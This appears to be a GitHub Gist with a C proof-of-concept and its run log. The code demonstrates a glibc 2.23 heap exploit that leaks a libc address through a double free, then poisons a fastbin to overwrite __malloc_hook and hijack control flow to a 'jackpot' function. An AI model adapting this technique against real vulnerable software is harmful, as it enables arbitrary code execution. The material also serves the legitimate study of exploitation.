Last active
January 6, 2020 12:05
-
-
Save inaz2/0fbfe243ca9e4b904edad037d0d76697 to your computer and use it in GitHub Desktop.
overwrite malloc_hook by fastbins unlink attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void jackpot() { puts("jackpot!"); } | |
| int main() | |
| { | |
| puts("[+] allocate p1, p2"); | |
| char *p1 = malloc(0x100); | |
| char *p2 = malloc(0x100); | |
| printf("p1 = %p\n", p1); | |
| printf("p2 = %p\n", p2); | |
| puts("\n[+] free p1, p2"); | |
| free(p1); | |
| free(p2); | |
| puts("\n[+] allocate p3"); | |
| char *p3 = malloc(0x100); | |
| printf("p3 = %p\n", p3); | |
| puts("\n[+] p1 double free"); | |
| free(p1); | |
| puts("\n[+] leak libc address via p3"); | |
| void *arena_top = *(void **)p3; | |
| void *malloc_hook = arena_top - 0x68; | |
| printf("arena_top = %p\n", arena_top); | |
| printf("malloc_hook = %p\n", malloc_hook); | |
| puts("\n[+] allocate p4"); | |
| char *p4 = malloc(0x100); | |
| printf("p4 = %p\n", p4); | |
| puts("\n[+] allocate p5 with size 0x60"); | |
| char *p5 = malloc(0x60); | |
| printf("p5 = %p\n", p5); | |
| puts("\n[+] free p5"); | |
| free(p5); | |
| puts("\n[+] abuse p4 overflow"); | |
| memset(p4, 'A', 0x100); | |
| *(void **)(p4+0x108) = 0x71; | |
| *(void **)(p4+0x110) = (void *)malloc_hook-0x20-3; | |
| puts("\n[+] allocate p6, p7 with size 0x60"); | |
| char *p6 = malloc(0x60); | |
| char *p7 = malloc(0x60); | |
| printf("p6 = %p\n", p6); | |
| printf("p7 = %p\n", p7); | |
| puts("\n[+] overwrite *(p7+0x13) = malloc_hook"); | |
| memset(p7, 'A', 0x13); | |
| *(void **)(p7+0x13) = jackpot; | |
| puts("\n[+] allocate p8"); | |
| char *p8 = malloc(0x100); | |
| printf("p8 = %p\n", p8); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook | |
| fastbins_malloc_hook.c: In function ‘main’: | |
| fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p4+0x108) = 0x71; | |
| ^ | |
| $ ./fastbins_malloc_hook | |
| [+] allocate p1, p2 | |
| p1 = 0xd36420 | |
| p2 = 0xd36530 | |
| [+] free p1, p2 | |
| [+] allocate p3 | |
| p3 = 0xd36420 | |
| [+] p1 double free | |
| [+] leak libc address via p3 | |
| arena_top = 0x7f30e669eb78 | |
| malloc_hook = 0x7f30e669eb10 | |
| [+] allocate p4 | |
| p4 = 0xd36420 | |
| [+] allocate p5 with size 0x60 | |
| p5 = 0xd36530 | |
| [+] free p5 | |
| [+] abuse p4 overflow | |
| [+] allocate p6, p7 with size 0x60 | |
| p6 = 0xd36530 | |
| p7 = 0x7f30e669eafd | |
| [+] overwrite *(p7+0x13) = malloc_hook | |
| [+] allocate p8 | |
| jackpot! | |
| p8 = 0x9 | |
| $ /lib/x86_64-linux-gnu/libc.so.6 | |
| GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al. | |
| Copyright (C) 2016 Free Software Foundation, Inc. | |
| This is free software; see the source for copying conditions. | |
| There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
| PARTICULAR PURPOSE. | |
| Compiled by GNU CC version 5.3.1 20160413. | |
| Available extensions: | |
| crypt add-on version 2.1 by Michael Glad and others | |
| GNU Libidn by Simon Josefsson | |
| Native POSIX Threads Library by Ulrich Drepper et al | |
| BIND-8.2.3-T5B | |
| libc ABIs: UNIQUE IFUNC | |
| For bug reporting instructions, please see: | |
| <https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment